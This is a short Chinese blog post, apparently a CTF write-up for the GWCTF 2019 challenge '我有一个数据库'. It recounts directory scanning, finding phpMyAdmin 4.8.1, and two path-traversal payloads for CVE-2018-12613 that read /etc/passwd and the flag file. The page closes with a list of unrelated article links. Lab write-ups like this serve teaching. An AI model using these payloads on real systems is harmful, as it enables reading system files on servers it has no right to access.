当前位置:网站首页>[GWCTF 2019]我有一个数据库1
[GWCTF 2019]我有一个数据库1
2022-08-08 06:22:00 【Joker. .】
进来是一堆乱码,查看源码,抓包都没发现什么,这个时候就只能用dirsearch
去扫一下了

可以看到有个/phpmyadmin界面访问一下

得到这样一个界面,关注的点应该在下面这个,一般这种都是查一下版本漏洞

这个是存在这样一个漏洞的phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
接下来执行一下漏洞复现
payload:phpmyadmin/?target=db_sql.php%253f/../../../../../../../../etc/passwd

执行成功,既然/etc/passwd可以被读取成功,就直接尝试一下读取flag
payload:phpmyadmin/?target=db_sql.php%253f/../../../../../../../../flag

拿到
(第一次写,纯纯记录一下)
边栏推荐
猜你喜欢
随机推荐
PAT乙级-B1029 旧键盘(20)
分类任务说明
Kingbase ES创建过程,报错:PL/SQL block not end correctly
2-SAT
leetcode 232. Implement Queue using Stacks
LLVM系列第二十九章:写一个简单的常量加法“消除”工具(Pass)
ffmpeg获取视频时长和分辨率
C语言中求两数最大公约数的三种方法
信息传输率(Information Translate Rate,ITR)
从ELF格式分析arm动态链接原理
unordered_map 在读写锁下多线程潜在的core 问题
数组对象方法
分布式系统设计之高可用大全
Why should Latches be avoided in digital IC design?
CUDA10安装支持gpu的tensorflow版本
模板实例化导致编译器未能识别decltype(auto)
demo:数组方法-商品查询
oracle的插入sql错误
YoloV4训练自己的数据集(六)之Yolo -Tiny
Key technologies for 4G/5G spectrum resource coordination









